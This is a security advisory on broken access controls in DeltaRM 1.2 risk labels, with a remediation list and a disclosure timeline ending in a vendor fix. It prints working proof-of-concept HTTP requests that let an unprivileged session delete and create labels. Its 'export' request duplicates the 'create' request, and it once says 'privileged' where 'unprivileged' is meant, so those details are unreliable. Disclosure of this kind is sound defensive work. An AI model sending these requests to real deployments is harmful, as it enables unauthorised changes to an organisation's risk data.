=======================================================================
- Broken Access Controls in Risk Labels
- Affected Product: DeltaRM 1.2
- Vendor: DeltaRM
- Severity: High
- Vulnerability Class: Broken Access Controls
- Status: Fixed
- Author(s): Renato Cruz =======================================================================
Using an privileged account, it is possible to edit, create, and delete risk labels, such as Criticality and Priority Indication labels. By using the /core/table/query endpoint, and by using a POST request and indicating the affected label with tableUid parameter and the operation with datas[query], it is possible to edit, create, and delete the following labels: Priority Indication, Quality Evaluation, Progress Margin and Priority. Furthermore, it is also possible to export Criticality labels with an unprivileged user.
To delete labels, as an authenticated user, send the following request:
POST /core/table/query?q=table HTTP/1.1
Host: deltarm.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=*unprivileged user session id*
tableUid=tableRisqueCriticiteType&datas%5Bquery%5D=delete-rows&datas%5Bids%5D%5B%5D=*table id*
To create new labels:
POST /risque/administration/parametrage/ajax-create-criticite-type HTTP/1.1
Host: deltarm.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=*unprivileged user session id*
deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B0%5D%5Blibelle%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B0%5D%5Bdescription%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B1%5D%5Blibelle%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B1%5D%5Bdescription%5D=NEW&deltaRM_Form_CriticiteType%5Bcouleur%5D=d&deltaRM_Form_CriticiteType%5B_token%5D=*csrf token*
To export labels:
POST /risque/administration/parametrage/ajax-create-criticite-type HTTP/1.1
Host: deltarm.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=*unprivileged user session id*
deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B0%5D%5Blibelle%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B0%5D%5Bdescription%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B1%5D%5Blibelle%5D=NEW&deltaRM_Form_CriticiteType%5BcriticiteTypeLibelles%5D%5B1%5D%5Bdescription%5D=NEW&deltaRM_Form_CriticiteType%5Bcouleur%5D=d&deltaRM_Form_CriticiteType%5B_token%5D=*csrf token*
The application needs to validate the current user roles and permissions, and guarantee that the user only has access to the expected allowed features and context.
- With the exception of public resources, deny by default.
- Log access control failures, alert admins when appropriate (e.g. repeated failures).
- Rate limit API and controller access to minimize the harm from automated attack tooling.
- JWT tokens should be invalidated on the server after logout.
- Developers and QA staff should include functional access control unit and integration tests.
- 26-10-2021: Vulnerability disclosed to DeltaRM
- 28-10-2021: Acknowlegement from vendor
- 11-12-2021: Fix released by the vendor
- 10-01-2022: Retest performed, vulnerability fixed